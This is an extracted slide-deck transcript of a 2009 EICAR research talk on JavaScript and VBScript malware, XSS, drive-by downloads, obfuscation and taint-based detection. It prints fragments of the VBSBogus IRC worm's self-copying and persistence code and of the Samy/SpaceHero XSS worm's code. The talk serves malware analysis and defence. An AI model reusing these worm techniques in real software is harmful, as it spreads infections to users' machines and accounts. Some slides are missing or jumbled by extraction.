Research & Development Operational Cryptology & Virology Lab. JavaScript and VisualBasicScript Threats: Different scripting languages for different malicious purposes JACOB Grégoire 1/2 1 Superior School of Computing, Electronic and Automatic (ESIEA), Operational Cryptology & Virology Lab. 2 Orange Labs, Security and Trusted Transactions (MAPS/STT). 18 th International EICAR Conference BERLIN – May 2009
72
Embed
JavaScript and VisualBasicScript Threats - EICAR · AJAX = Asynchronous JS and XML ... less and less used for web pages or inside applications ... Response page is built using request
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Research & DevelopmentOperational Cryptology & Virology Lab.
JavaScript and VisualBasicScript Threats:Different scripting languages for different malicious purposesJACOB Grégoire 1/2
1 Superior School of Computing, Electronic and Automatic (ESIEA), Operational Cryptology & Virology Lab.
2 Orange Labs, Security and Trusted Transactions (MAPS/STT).
18th International EICAR ConferenceBERLIN – May 2009
May 2009/G. Jacob – p 2 research & development France Telecom Group/ESIEA
Outline
Context� Increasing popularity of scripting languages
� Additional extensions to increase interactivity
� New attack vectors through the web browser� 70% of the sites from the Top 100 host malicious code1
� 46% of additional malicious sites from 2008 to 20091
1According to the WebSense Report [01]
Problematics� What differences between the scripting languages ?
� Which protection are deployed and which attacks remain possible ?� Do the introduction of extensions means new attack holes ?
May 2009/G. Jacob – p 3 research & development France Telecom Group/ESIEA
� Introduction to JavaScript and VisualBasicScript
� Malicious potential of JavaScript and VisualBasicScript
� Study cases: script malware
� Static or dynamic analysis? the obfuscation problem
� Dynamic analysis: event traces and tainting
� Conclusions
1
2
3
Summary
4
5
6
May 2009/G. Jacob – p 4 research & development France Telecom Group/ESIEA
1Introduction to the JS and VBS scripting languages and their interpreters
May 2009/G. Jacob – p 5 research & development France Telecom Group/ESIEA
1.1 JS and VBS, equivalent languages?
At first glance, the answer would be "yes"…� Interpreted languages� Embedded in web pages for dynamic enhancements
… after a little digging, differences arise
* Not fully object-oriented: no support of inheritance and polymorphism
Procedural and Object-based* using a class approach
Procedural and Object-based* using a prototype approach
Principle
Syntax derived from Visual BasicSyntax derived from C/C++
Created by MicrosoftCreated by NetscapeHistory
VisualBasicScriptJavaScript
May 2009/G. Jacob – p 6 research & development France Telecom Group/ESIEA
1.2 Available features in JS and VBS
Features of the core language� Structure:
� Manipulations:
� No accesses to files, web pages, network in the core!
� JS core is compliant with the broadly spread ECMAScript [02]
- functions- loops- conditionals
- math expressions- character strings- regular expressions - basic user interactions
May 2009/G. Jacob – p 7 research & development France Telecom Group/ESIEA
1.2 Available features in JS and VBSAdditional extensions in JavaScript
JS
ActiveX
XPCOM
DOM
CurrentWeb Page
ThroughIE only
ThroughFF only
AJAX
Live Connect
ADO
Databases
Java Virtual Machine
Local or throughASP Pages
ADO = ActiveX Data ObjectsAJAX = Asynchronous JS and XMLASP = Active Server PageDOM = Document Object ModelXPCOM = Cross-Platform Component Object Model
Application, libraries, files,
registry…
Application, libraries, files,
registry…
Web or XML Servers
May 2009/G. Jacob – p 8 research & development France Telecom Group/ESIEA
1.2 Available features in JS and VBSAdditional extensions in VisualBasicScript
VBS
ActiveX
AJAX
DOM
CurrentWeb Page
ADO
WMI
ADSI
ADO = ActiveX Data ObjectsADSI = Active Directory Service Interfaces AJAX = Asynchronous JS and XML WMI = Windows Management Instrumentation
Application, libraries, files,
registry…
Web or XML Servers
Active Directory
Windows Environment
Databases
May 2009/G. Jacob – p 9 research & development France Telecom Group/ESIEA
1.3 Constraints of scripting languages
Scripts induce available source code� Strong constraint from the attacker perspective to remain undetected
Scripts induce an interpreter for execution� Portability issues
-Quicktime ([03])
-PDF tools ([04])-Adobe Flash
-OpenOffice
…
Embedded Interpreters
-Internet Explorer only (IE)
-Internet Information System (IIS)-Windows Scripting Host (WSH)
-Majority of Web-BrowsersMain Interpreters
VisualBasicScriptJavaScript
May 2009/G. Jacob – p 10 research & development France Telecom Group/ESIEA
1.3 Constraints of scripting languages
Observations� Contrary to JS, VBS is proprietary and not cross-browser
� less and less used for web pages or inside applications
� VBS has local interpreters under all recent Windows versions
� increasing use for stand-alone scripts such as administrating1
1In concurrence with PowerShell
May 2009/G. Jacob – p 11 research & development France Telecom Group/ESIEA
1.4 Services provided by the interpreter
Code execution � Compilation (syntax checking) and interpretation in two passes� Mandatory support of the language core
� Optional support of extensions • Extensions require interfaces with the dedicated handlers
• Interpreters do not support all extensionse.g. ActiveX under FireFox requires additional plugins
Security enforcement� Sandboxing
� Security policies restricting accesses to the interpreter services• Restrict execution to signed scripts
• Same Origin Policy in browser (both JS and VBS)
May 2009/G. Jacob – p 12 research & development France Telecom Group/ESIEA
1.4 Services provided by the interpreter
Same Origin Policy (SOP) [05]� Instantiated in Web Browser� Origin = (protocol, domain, port)
� Derives access rights for the script elements from their URL
� Read and write accesses only to elements sharing the same origin: • Constrains DOM manipulations
• Constrains URLs request through AJAX
May 2009/G. Jacob – p 13 research & development France Telecom Group/ESIEA
1.4 Services provided by the interpreter
Same Origin Policy (SOP) [05]
Different protocol��������file://C:/Documents and Settings/.../TemporaryInternet Files/Cookie:[email protected]/
Different host��������http://news.company.com/dir/other.html
Different port��������http://store.company.com:81/dir/etc.html
Different protocol��������https://store.company.com/secure.html
Origin (Example from the Mozilla Developper Center)
May 2009/G. Jacob – p 14 research & development France Telecom Group/ESIEA
2Malicious potential of JS and VBS
May 2009/G. Jacob – p 15 research & development France Telecom Group/ESIEA
2.1 Different trends for JS/VBS attacks
Nature of attacks according to the language� Depends on portability and available extensions� Local execution induces standard infection scenarios� Browser execution induces web attacks� Bypass existing security protections
Observations� VBS is vector of stand-alone malware (e.g. LoveLetter)
� JS is mainly vector of web attacks for reconnaissance, privacy intrusions or usurpations (e.g. XSS, XCRSF, XST) [06] but …
� … JS enables drive-by download for stand alone malware (e.g. Feebs)
� … JS enables the propagation of XSS Worms [07] (e.g. Samy)
May 2009/G. Jacob – p 16 research & development France Telecom Group/ESIEA
2.2 Circumventing the SOP
The Same Origin Policy is not the ultimate defense [08]� Legitimate bypass:
• Include images or style sheets from other domains
� Bypass through implementation vulnerabilities: • IE exploit in XmlHttpRequest (2005) [09]
• Exploit using XBL binding on unloaded document (2008) [10]
� Restriction to web-browsers:• Policy extended to coexisting scripts (Flash) or external referenced scripts
• No longer applied to browser helpers or plugins [13]
• No longer applied in local interpreter
May 2009/G. Jacob – p 17 research & development France Telecom Group/ESIEA
2.2 Circumventing the SOP
Top 10 Web Attack Vectors in Second Half of 2008 1
1. Browser vulnerabilities2. Rogue antivirus/social engineering3. SQL injection4. Malicious Web 2.0 components5. Adobe Flash vulnerabilities6. DNS Cache Poisoning and DNS Zone file hijacking7. ActiveX vulnerabilities8. RealPlayer vulnerabilities9. Apple QuickTime vulnerabilities10. Adobe Acrobat Reader PDF vulnerabilities
1According to the WebSense Report [01]
May 2009/G. Jacob – p 18 research & development France Telecom Group/ESIEA
2.3 Recalls on XSS
Attack prevalence � In 2008, 82% of websites still vulnerable to various web attacks [14]
� In 2006, 71% of the audited sites were vulnerable to XSS [15]
� Blacklist of vulnerable websites [16]
XSS principles [17,18]� Force a website to echo executable code
� Server acts as a simple relay� Code is loaded in the user's browser
� Code is executed with the website privileges
May 2009/G. Jacob – p 19 research & development France Telecom Group/ESIEA
2.3 Recalls on XSS
Persistent XSS attacks� Store xss code into a persistent area of a visited page� Attack is executed when a visitor load the page in its browser
� Well adapted to community sites, forum or open comments
<script>xss attack</script>
AttackerUser
Website
storeload
execute
May 2009/G. Jacob – p 20 research & development France Telecom Group/ESIEA
2.3 Recalls on XSS
Non-Persistent XSS attacks� Crafted link points to the vulnerable site and contains the attack code � Clicking on the code send crafted request to the site
� Response page is built using request inputs (e.g. search engine)
� Attack code is loaded and executed with the response page
Website
<script>xss attack</script>
AttackerUser click
craft link(embedded code)
www.link.com\var?code
responsepage
execute
May 2009/G. Jacob – p 21 research & development France Telecom Group/ESIEA
2.4 Drive-by download
Principle [19]� Pull-based technique to download and execute stand-alone malware
� Relies on XSS attacks for download (e.g. through persistent media content)
� Found at 450.000 URLs out of 4.500.000 in 2007� More than 18 Millions of attempts in 2008 [20]
Automated toolkits� Generating web-attacks for drive-by download
� No real technical skills needed� Mpack, Neosploit, Icepack, El Fiesta, Adpack…
May 2009/G. Jacob – p 22 research & development France Telecom Group/ESIEA
2.4 Drive-by download
Overview of Mpack [21]� Complete website containing exploits for download
� Only requires configuration, online deployment and advertising• Search keywords, advertisements on other sites, URL similar to popular…
� Configuration: how easy?
� Presentation of the tool•Index.php fingerprint browser and launch related exploits
•Mdac4.php exploit for IE•Cryptor.php obfuscation
•File.php configure downloaded malware
•Settings.php site administration
•Stat.php statistics on infections
May 2009/G. Jacob – p 23 research & development France Telecom Group/ESIEA
2.4 Basic protection against attacksDetection by signature scanning
� Traditional AV signature against stand-alone malware
� Vulnerability signatures against web exploit • Scanning scripts locally to the browser (e.g. WebInspect, Cenzic HailStorm…)
• Scanning the network flow but can not check dynamically built content [22]
• Compromise: recursively rebuilding dynamic content from incoming traffic before submitting to the browser [23]
Prevention against web attacks� Filtering data submitted by users on the server-side
• Filtering tag characters (e.g. <,>) or keywords (e.g. script, javascript)
• Existing evasion techniques [24]
� Tag untrusted inputs from the user • detect their use in the constructions of responses [25]
� Systematic requests for the user authorization
• forbidding transparent communications (AJAX)
May 2009/G. Jacob – p 24 research & development France Telecom Group/ESIEA
3Study cases: script malware
May 2009/G. Jacob – p 25 research & development France Telecom Group/ESIEA
AttackerInfected User DCC event
3.1 Stand-alone Malware in VBS
� Script reusing similar techniques to executables
IRC Worm Example: VBSBogus� Rely on Direct Client to Client protocol (DCC)
original infection
User
triggeredDCC send
IRC client configuration
May 2009/G. Jacob – p 26 research & development France Telecom Group/ESIEA
3.1 Stand-alone Malware in VBS
� Script reusing similar techniques to executables
IRC Worm Example: VBSBogus� Duplication: use the file system: "Scripting.FileSystemObject"
� Duplication methods: 1) single block read-write
set f = fso.OpenTextFile(Wscript.ScriptFullName,1);
var mecode = f.Read(worm size);
set nw = fso.CreateTextFile( "C:\a.b" );
nw.WriteLine(mecode);
� Duplication methods: 2) direct transfer
fso.CopyFile(Wscript.ScriptFullName,
"C:\Windows\help\Bogus.vbs" );
Self-Reference
Equivalents: fso.MoveFile or file.Copy
May 2009/G. Jacob – p 27 research & development France Telecom Group/ESIEA
3.1 Stand-alone Malware in VBS
� Script reusing similar techniques to executables
IRC Worm Example: VBSBogus� Residency: use configuration file of mIRC: "script.ini" [26]
� Automatic event-triggered command
set ini = fso.opentextfile( "C:\mirc\script.ini" )
ini.WriteLine "[script]"
//Script executed when mirc launched
May 2009/G. Jacob – p 28 research & development France Telecom Group/ESIEA
3.1 Stand-alone Malware in VBS
� Script reusing similar techniques to executables
IRC Worm Example: VBSBogus� Propagation: sending over IRC channel
� If DCC auto-get activated then files are accepted without notification
� Analysis of the worm body by functional blocks • Code samples reformatted, deofuscated and stripped from error handling
'\n' to avoid keyword stripping
Worm body
May 2009/G. Jacob – p 36 research & development France Telecom Group/ESIEA
3.2 Web-based Malware in JS
� Script using web-based attacks
XSS Worm Example: JS.SpaceHero Worm [22]� First block: recovering the self-reference
//Recovers the html code inside the current wed page
function g(){ //Relies on the DOM architecture
var D = document.body.createTextRange();
var C = D.htmlText;
if (C){ return C; } else { return document.body.innerHTML; }
}
May 2009/G. Jacob – p 37 research & development France Telecom Group/ESIEA
3.2 Web-based Malware in JS
� Script using web-based attacks
XSS Worm Example: JS.SpaceHero Worm [27]� First block: recovering the self-reference
� Code localization and formatting
var AA = g(); //Gets the html code of the page
var AB = AA.indexOf( "mycode" ); //Search for mycode id
var AC = AA.substring(AB,AB+4096); //Worm body substring
var AD = AC.indexOf( "DIV" );
var AE = AC.substring(0,AD);
var AF;
if (AE){ //Rebuild div tag with the worm code as a string
AF = " but most of all, samy is my hero. <div id=" +AE+"DIV>" ;
}
May 2009/G. Jacob – p 38 research & development France Telecom Group/ESIEA
3.2 Web-based Malware in JS
� Script using web-based attacks
XSS Worm Example: JS.SpaceHero Worm [27]� Second block: information recovery � Parse request to collect information about user being infected
function getQueryParams(){var E = document.location.search; //Access request URLvar F = E.substring(1,E.length).split( '&' ); var AS = new Array();for ( var O = 0; O < F.length; O++){
var I=F[O].split( '=' ); //Split parameters and valuesAS[I[0]]=I[1]; //Associative table
}return AS;
}//Example AS = ["fuseaction" - "user.viewProfile",
"friendID" - "XXXXXXXXX" ]
May 2009/G. Jacob – p 39 research & development France Telecom Group/ESIEA
3.2 Web-based Malware in JS
� Script using web-based attacks
XSS Worm Example: JS.SpaceHero Worm [27]� Third block: AJAX communication
� What's left ?• Execution of dynamically built strings!
Is obfuscation really deployed ?� The answer is yes
� Obfuscation more advanced in JS because of short XSS attacks� Same techniques feasible in VBS but …
• Stand-alone malware, being complex, deploy less evolved techniques
May 2009/G. Jacob – p 48 research & development France Telecom Group/ESIEA
4.2 Script obfuscation
String execution� eval/execute provided by the core of the language� onload/onunload and other events provided by the DOM
� document.write/writeln provided by the DOM• Rewrite the webpage, code is executed on loading
String obfuscation� Character encoding (e.g. chr, encode, escape)
� String splitting
� String formatting or ciphering
Easy to reverse by normalization: decoding and
concatenation
Hard to reverse withoutdynamic execution
May 2009/G. Jacob – p 49 research & development France Telecom Group/ESIEA
4.2 Script obfuscation
Efficient ?
May 2009/G. Jacob – p 50 research & development France Telecom Group/ESIEA
4.3 Deobfuscation techniques
Simulation-based (e.g. CaffeineMonkey, JSunpack) [35,36,37]� Run the script inside an interpreter� Catch operations where string are executed � Pro - independent from browser� Cons - problems of coverage with undefined objects, extensions
Browser hooking (e.g. Ultimate Deobfuscator) [38]� Interpreter attached to a web-browser� Hooking execution operations in dlls
• Interpreter and extension handlers
� Pro - good coverage with no risk of simulation detection� Cons - limited to a single browser, requires execution containment
May 2009/G. Jacob – p 51 research & development France Telecom Group/ESIEA
4.3 Deobfuscation techniques
Efficient ?
� Demo of an extended version of Caffeine Monkey
May 2009/G. Jacob – p 52 research & development France Telecom Group/ESIEA
May 2009/G. Jacob – p 56 research & development France Telecom Group/ESIEA
5.3 Tainting
� Simple event correlation misses data-flow (e.g. accessed cookie contained in the new location set)
Tainting Principles [41]� Tainted sources made up of sensitive data
• Information with potential abuse
� Taint propagation• Inside interpreter and towards and from extension handlers
• Propagation through affectation, computation and indirect control
� Sensitive sinks where data is maliciously used or transmitted• Changing location, form submission, XmlHttpRequests
cookies, history…Attempts to privacy
browser version, URLs, domains…Attack launching
May 2009/G. Jacob – p 57 research & development France Telecom Group/ESIEA
5.4 Joining collection and tainting
Features of the designed collection tool� Accesses to extension constitute the collected events
� Tainting support for the manipulated strings• Tainting according to the source (self-reference, private or received data…)• Taints propagation through manipulations (concatenate, split, replace…)
� Checking for tainted parameters on logged events
Tool development� Extension of CaffeineMonkey to log additional events
� Independent from browsers (IE, FF, etc)� Virtualized extensions
• Manipulating fake pages for DOM, fake files or mails for ActiveX
• Handling events and callback routine for AJAX
May 2009/G. Jacob – p 58 research & development France Telecom Group/ESIEA
5.4 Joining collection and tainting
Demo tainting: Psyme Trojan (drive-by download)
Tainted data fromXMLHttpRequest
Taint propagation trough write operation
Executing file containing tainted data
Type 3 = Received data
Source = XMLHttp Request
May 2009/G. Jacob – p 59 research & development France Telecom Group/ESIEA
5.4 Joining collection and tainting
Demo tainting: SpaceHero (xss propagation)
Call callback function
Access self-reference
Taint propagation inside request
Store callback function
Type F = Self-Reference
May 2009/G. Jacob – p 60 research & development France Telecom Group/ESIEA
6Conclusions
May 2009/G. Jacob – p 61 research & development France Telecom Group/ESIEA
6 Considerations
Key points of the tutorial� The attack nature depends on the language features and portability
• VBS is mainly vehicle for stand-alone malware
• JS is mainly vehicle for web-based malware
� Technical means of stand-alone and web-based malware differ• Stand-alone malware infect the user system locally
• Web-based malware infect servers as relays to reach the user through the browser
� Purposes of stand-alone and web-based malware rejoin• Register in the system• Access personal, professional and financial data
• Malware is now a business (credit card market, zombie networks…)
May 2009/G. Jacob – p 62 research & development France Telecom Group/ESIEA
6 Considerations
Perspectives� Study the use of event collection and tainting on other attacks
• XSS is not the only attack: XSRF, XTRACE….
� Study additional scripting language• JavaScript and VisualBasicScript are not the only languages:
Php, ActiveScript from Flash…
� Browsers and JavaScript supported by portable devices• MiniOpera for example partially supports the DOM and AJAX [42]
• Additional extensions specific to mobile? SMS, phone book, etc
May 2009/G. Jacob – p 63 research & development France Telecom Group/ESIEA
Thank you for your attention,
Any questions?
May 2009/G. Jacob – p 64 research & development France Telecom Group/ESIEA
References
[01] WebSense Security Labs – "State of Internet Security" , White Paper Q3 – Q4, 2008.
[02] ECMA International – "ECMAScript LanguageSpecifications" , Standard ECMA-262, 3rd revision, 1999.
[03] Apple Computer Inc – "JavaScript Scripting Guide for QuickTime" , 2005.
[05] Jesse Ruderman – "The Same Origin Policy" , 2001. http:// www. mozilla.org/ projects/security/components/same-origin.html
[06] Martin Johns – "On "JavaScript Malware and RelatedThreats" , Journal in Computer Virology, Vol. 4, No. 3, 2008.
May 2009/G. Jacob – p 65 research & development France Telecom Group/ESIEA
References
[07] Jeremiah Grossman – "Cross-Site Scripting Worms and Viruses – The impending threat and the best defense" , WhiteHatSecurity, 2006.
[08] Justin Schuh – "Same-Origin Policy Part 1: Why we're stuckwith Things like XSS and XSRF" , The Art of Software Security Assessment 2007. http://tassoa.com/index.php/2007/02/08/same-origin-policy.html[09] Amit Klein – "Exploiting the XmlHttpRequest object in IE –Referrer spoofing and a lot more..." , 2005. http:// www.cgisecurity. Com/lib/XmlHTTPResquest.shtml#
[10] Mozilla Foundation Security Advisory – "XSS and JavaScript Privilege Escalation" , MFA-2008-68 (CVE-2008-5511), 2008. http://www.mozilla.org/annouce/2008/mfsa2008-68.html
May 2009/G. Jacob – p 66 research & development France Telecom Group/ESIEA
References
[11] Jesse Burns – "Cross-Site Reference Forgery – An introduction to a common web application weakness" , Version 1.1, Information Security Partners, 2005.
[12] Jeremiah Grossman – "Cross-Site Tracing (XST) – The new techniques and emerging threats to bypass current web security measures using trace and xss" , WhiteHat Security, 2003
[13] Mike Ter Louw, Jim Soon Lim, V.N. Venkatakrishnan –"Enhancing Web-Browser Security against Malware Extensions" , Journal in Computer Virology, Vol. 4, No. 3, 2008.
May 2009/G. Jacob – p 67 research & development France Telecom Group/ESIEA
References
[15] Michael Sutton – "How prevalent are XSS vulnerabilities?" , 2007. http://www.communities.hp.com/securitysoftware/blogs/msutton/archive/2007/01/31/How-Prevalent-Are-XSS-Vulnerabilities_3F 00 _.aspx[16] Point Blank Security – "The XSS Blacklist #2" , 2005. http://www.pointblanksecurity.com/xss/xss2.php[17] David Endler – "The Evolution of Cross-Site Scripting Attacks" , iALERT White Paper, iDEFENSE, 2002.[18] Cgisecurity – "The Cross-Site Scriting (XSS) FAQ" , 2002. http://www.cgisecurity.com/xss-faq.html[19] Niels Provos, Dean McNamee, Panayiotis Mavrommatis, KeWang and Nagendra Modadugu – "The Ghost in the Browser: Analysis of Web-based Malware" , USENIX HotBots, 2007.
May 2009/G. Jacob – p 68 research & development France Telecom Group/ESIEA
References
[20] Symantec – "Web Based Attacks " , White Paper, 2009.
[22] Helen J. Wang, Chuanxiong Guo, Daniel R. Simon and Alf Zugenmaier – "Shield: Vulnerability-Driven Network Filters for Preventing Known Vulnerability Exploits" , SIGCOMM, 2004.
[23] Charles Reis, John Dunagan, Helen J. Wang, Opher Dubrovskyand Saher Esmeir – "BrowserShield: Vulnerability-Driven Filtering of Dynamic HTML" , ACM Transactions on the Web (TWEB), Vol. 1, No. 3, 2007.
May 2009/G. Jacob – p 69 research & development France Telecom Group/ESIEA
References
[25] Kevin Lam – "MS Anti-cross Site Scripting Library V1.5: Protecting the contoso bookmark page" , MSDN, 2006. http://msdn.microsoft.com/en-us/library/aa973813.aspx
[26] mIRC Faq – "Some notes on "programming" in Mirc ". http:// www. mirc.com/faq7.html#section7
[27] Samy – "Technical explanation of The MySpace Worm ", 2005. http://namb.la/popular/tech.html
[28] The HP Security Laboratory – "XSS+Ajax worm attackingYahoo mail users ", 2006. http://www.communities.hp.com/security software/blogs/spilabs/archive/2006/06/13/XSS_2B00_Ajax-worm-attacking-Yahoo-mail-users.aspx
[33] Arjun Guha, Shriram Krishnamurthi and Trevor Jim – "Using Static Analysis for Ajax Intrusion Detection" , International World Wide Web Conference, 2009.
[34] Jean-Yves Marion and Daniel Reynaud-Plantey – "PracticalObfuscation by Interpretation" , 3rd Workshop on the Theory of Computer Viruses (WTCV), 2008.
May 2009/G. Jacob – p 71 research & development France Telecom Group/ESIEA
References
[35] Ben Feinsten, Daniel Peick – "Caffeine Monkey – Automatedcollection, detection and analysis of malicious Javasc ript" , Black Hat USA, 2007.
[38] Stephan Chenette – "The Ultimate Deobfuscator" , ToorConX, 2008.
[39] David Wagner – "Janus: an approach for confinement of untrusted applications" , Technical Report CSD-99-1056, 1999.
May 2009/G. Jacob – p 72 research & development France Telecom Group/ESIEA
References
[40] Oystein Hallaraker and Giovanni Vigna – "Detecting MaliciousJavaScript Code in Mozilla" , Proceedings of the 10th IEEE International Conference on Engineering of Complex Computer Systems, 2005.
[41] Philipp Vogt, Florian Nentwich, Nenad Jovannovic, Engin Kirda, Christopher Kruegel and Giovanni Vigna – "Cross-Site Scripting Prevention with Dynamic Data Tainting and Static Analysis " , Proceeding of the Network and Distributed System Security Symposium (NDSS), 2007.[42] http://dev.opera.com/articles/view/javascript-support-in-opera-mini-4/